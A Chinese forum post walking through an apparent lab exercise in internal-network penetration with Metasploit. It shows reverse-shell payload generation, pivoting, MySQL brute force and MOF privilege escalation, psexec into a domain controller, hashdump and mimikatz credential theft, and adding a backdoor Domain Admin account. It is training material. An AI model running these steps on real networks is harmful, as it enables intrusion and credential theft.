用户
搜索

[内网攻防] 记内网渗透的流程

  • TA的每日心情
    开心
    昨天 12:53
  • 签到天数: 7 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋-呆萌菜鸟

    Rank: 1

    7

    主题

    14

    帖子

    136

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2021-7-12
    发表于 2021-7-13 11:00:41 13313
    本帖最后由 zexin 于 2021-7-20 00:17 编辑

    记内网渗透的流程


    本篇文章作者zexin,本篇文章参与i春秋作家连载计划所属明天不熬夜了团队,未经许可禁止转载。连载方向:web安全,内网安全

    目录:
    1.XXE注入
    2.记内网渗透的流程
    3.MySQL超长字符截断SQL-Column-Truncation
    内网渗透有很多方法,下面介绍的是使用kali的metasploit.

    使用metasploit内网渗透的一般流程

    metasploit生成攻击载荷(window/linux/php...)
    msfVENOM  -p windows/meterpreter/reverse_tcp lhost=192.168.0.x  lport=xxx -f exe >/var/www/html/1.exe
    本地监听
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.x
    set lport xxx
    exploit
    增加路由
    run autoroute  -s x.x.x.x/24
    run autoroute –p
    增加代理
    use auxiliary/server/socks4a
    打开/etc/prxoychains.conf文件修改
    hash收集
    run hashdump
    提权
    getuid 当前用户 
    sysinfo 查看系统信息 
    getprivs 尽可能提升权限 
    getsystem 通过各种攻击向量来提升系统用户权限 等等。。。
    查看ip地址详情
    ipconfig /all
    探测内网存活IP
    run post/windows/gather/arp_scanner RHOSTS=192.168.x.0/24
    run post/multi/gather/ping_sweep RHOSTS=192.168.x.0/24
    保持会话,利用其它的攻击模块攻击内网其它主机
    migrate 注入进程 
    breakground

    一次内网渗透实验

    1.域的原理:


    其实可以把域和[工作组]联系起来理解,在工作组上你一切的设置在本机上进行包括各种策略,用户登录也是登录在本机的,密码是放在本机的数据库来验证的。而如果你的计算机加入域的话,各种策略是[域控制器]统一设定,用户名和密码也是放到域控制器去验证,也就是说你的账号密码可以在同一域的任何一台计算机登录。
    
    如果说工作组是“免费的旅店”那么域(Domain)就是“星级的宾馆”;工作组可以随便出出进进,而域则需要严格控制。“域”的真正含义指的是服务器控制网络上的计算机能否加入的计算机组合。一提到组合,势必需要严格的控制。所以实行严格的管理对网络安全是非常必要的。在对等网模式下,任何一台电脑只要接入网络,其他机器就都可以访问共享资源,如[共享上网]等。尽管[对等网络]上的共享文件可以加访问密码,但是非常容易被破解。在由Windows 9x构成的对等网中,数据的传输是非常不安全的 [1] 。
    
    不过在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为“[域控制器](Domain Controller,简写为DC)”。
    
    域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。当电脑联入网络时,域控制器首先要鉴别这台电脑是否是属于这个域的,用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确,那么域控制器就会拒绝这个用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,他只能以对等网用户的方式访问Windows共享出来的资源,这样就在一定程度上保护了网络上的资源。
    
    域控制器
    
    在Windows域中,该目录驻留在配置为“[域控制器]”的计算机上。域控制器是Windows或[Samba]服务器,它管理用户和域交互之间的所有安全相关方面,集中安全性和管理。域控制器通常适用于具有10[台]以上PC的网络。域是计算机的逻辑分组。域中的计算机可以在小型[LAN]上共享物理接近度,或者它们可以位于世界的不同部分。只要他们能够沟通,他们的实际位置就无关紧要了 。

    2.常用的域命令


    1.查看当前网卡配置信息,包括所属域以及IP段
    ipconfig /all
    2.查看域
    net view /domain

    wps7.jpg

    3.查看当前域中的计算机
    net view

    wps8.jpg

    4.查看CORP域中的计算机
    net view /domain:CORP

    wps9.jpg

    5.Ping计算机名可以得到IP
    ping Wangsong-PC

    net user /domain

    wps11.jpg

    7.获取域用户组信息(在域控查看)
    net group /domain

    wps12.jpg

    8.获取当前域管理员信息(在域控查看)
    net group "domain admins" /domain

    wps13.jpg

    9.查看域时间及域服务器的名字(在域控查看)
    net time /domain

    wps14.jpg
    这个要域管理权限才可以的

    10.添加普通域用户
    net user hack hack /add /domain

    wps15.jpg

    11.将普通域用户提升为域管理员
    net group "Domain Admins" hack /add /domain

    wps16.jpg

    3.利用metasploit生成后门


    生成攻击载荷
    msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.220.135 lport=12345 -f exe >/var/www/html/s.exe
    本地监听
    use exploit/multi/handler
    
    set payload windows/meterpreter/reverse_tcp
    
    set lhost 192.168.220.135(kali的IP地址)
    
    set lport 12345(kali的端口)
    
    exploit
    成功运行木马meterpreter后:
    getuid 当前用户
    
    getprivs 尽可能提升权限
    
    getsystem 通过各种攻击向量来提升系统用户权限

    wps17.jpg

    增加路由
    route add 10.10.1.3 255.255.255.0 (内网路由)

    meterpreter > background Backgrounding session 1...
    msf exploit(multi/handler) > route add 10.10.1.4 255.255.255.0 1Route added

    (先扫描目标开放的端口在接下去看mysql)

    use auxiliary/scanner/mysql/mysql_login(查看是否可弱口令登入)

    msf auxiliary (scanner/portscan/tcp) > exploit
    [+]10.10.1.3:
    -10.10.1.3:80 - TCP OPEN
    [+]10.10.1.3:
    -10.10.1.3:139 - TCP OPEN
    [+]10.10.1.3:
    -10.10.1.3:135 - TcP OPEN
    [+]10.10.1.3:
    -10.10.1.3:445 - TCP OPEN
    [+]10.10.1.3:
    -10.10.1.3:1025 - TCP OPEN
    [+]10.10.1.3:
    -10.10.1.3:3306 - TCP OPENAuxiliary module execution completed
    msf auxiliary (scanner/portscan/tep)> use auxiliary/scanner/mysql_login
    msf auxiliary(scanner/mysql/mysql_login) > show

    msf auxiliary(scanner/mysql/mysql_login) > exploit
    [+]10.10.1.3:3306

    • 10.10.1.3:3306 - Found remote MysoL version 5.1.33
      [-]10.10.1.3:3306
    • 10.10.1.3:3306 - LOGIN FAILED:root:admin (Incorrect
      : Access denied for user 'root'@'10.10.1.4'(using password:YES))
      [+]10.10.1.3:3306-10.10.1.3:3306 - Success: 'root:123456'Scanned 1 of 1 hosts ( 100%complete)Auxiliary module execution completed
    use exploit/windows/smb/p**ec
    use scanner/portscan/tcp
    use exploit/windows/mysql/mysql_mof mysql之mof提权

    msf auxiliary(scanner/mysql/mysql_login) > use exploit/windows/mysql/mysql_mof
    msf exploit(windows /mysql/mysql mof) > set PASSWORD 123456PASSwORD =>123456
    msf exploit(windows /mysql/mysql_mof) > set rhost 10.10.1.3rhost =>10.10.1.3
    msf exploit(windows/mysql/mysql_mof) > set USERNAME rootUSERNAME =>root
    msf exploit(windows/mysqi/mysql_mof) > set payload windows/meterpreter/bindtcppayload => windows /meterpreter/bind tcp
    msf exploit(windows/ mysql/mysql
    mof) > exploitStarted bind handler 10.10.1.3:3306 - Attemptina to loain as 'root:123456'

    Set payload windows/meterpreter/bind_tcp
     (反弹内网的机子到外网的kali:内网的无法直接和外网通信)
    通过mysql mof提权 得到 域客户机2003的 sessions
    通过ping内网的主机名 得到其IP地址

    c:\wINDows\system32>ping SERVERS2003ping sERVERS2003
    Pinging servers2003 [10.10.1.3] with 32 bytes of data:
    Reply from 10.10.1.3: bytes=32 time<1ms TTL=128
    Reply from 10.10.1.3: bytes=32 time<1ms TTL=128
    Reply from 10.10.1.3: bytes=32 time<1ms TTL=128
    Reply from 10.10.1.3: bytes=32 time<ims TTL=128

    Ping statistics for 10.10.1.3:
    Packets : Sent = 4,Received = 4,Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms,Average = 0ms

    c : \WINDOWS\system32>ping wIN-7230786H6KUping wIN- 7230786H6KU
    Pinging wIN-723 [10.10.1.2] with 32 bytes of data:
    Reply from 10.10.1.2: bytes=32 time<1ms TTL=128
    Reply from 10.10.1.2: bytes=32 time<1ms TTL=128
    Reply from 10.10.1.2: bytes=32 time<1ms TTL=128
    Reply from 10.10.1.2: bytes=32 time<1ms TTL=128
    Ping statistics for 10.10.1.2:
    Packets: sent = 4,Received = 4,Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds :
    Minimum = 0ms, Maximum = 0ms,Average = 0ms

    查看域的时间来确定域控制器是win_723。。。

    c: \wINDows\system32>net time / domain
    net time /domain
    \wIN-723  ,0j0jR6t66 2021-4-6 20:16

    获取 hashdump

    获取明文

    meterpreter > hashdump
    Administrator:500:7473799d16fd7eefc81667e9d738c5d9:befccf58421ac6b3b2815de02ca1616:::
    ASPNET:1006:80b60fc868a0cbc3bd0107c50c110a28:e04a5c063acf0ac96c00809a3ea194cf::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::IUSR wWw-7D165A978F4:1000:23a1de9066032b6646bb5d5cc9f4c859:c53193935ad813f22fc356905671c62:::

    load mimikatz
    msv  
    kerberos  

    因为普通域用户 需要更改系统信息 都需要通过域管理员的操作 要输入帐号和密码

    use exploit/windows/smb/p**ec
    进入域控

    719.png

    run post/windows/gather/hashdump
    
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:f8db9dd8aa13fa4e008f693fb7c56935:::
    
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    
     在百度查找在线hash解密
    开启域控3389
    run  getgui  -e

    得到域控的权限。

    开启代理socks4需要修改kali的/etc/proxychains.conf
    再末尾添加socks4 192.168.220.135 1080

    最后通过kali已rdesktop 的内网靶机远程连接域控,登录域控


    wps38.jpg
    wps10.jpg
    719.png
    wps24.jpg
    wps26.jpg
    6666666
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册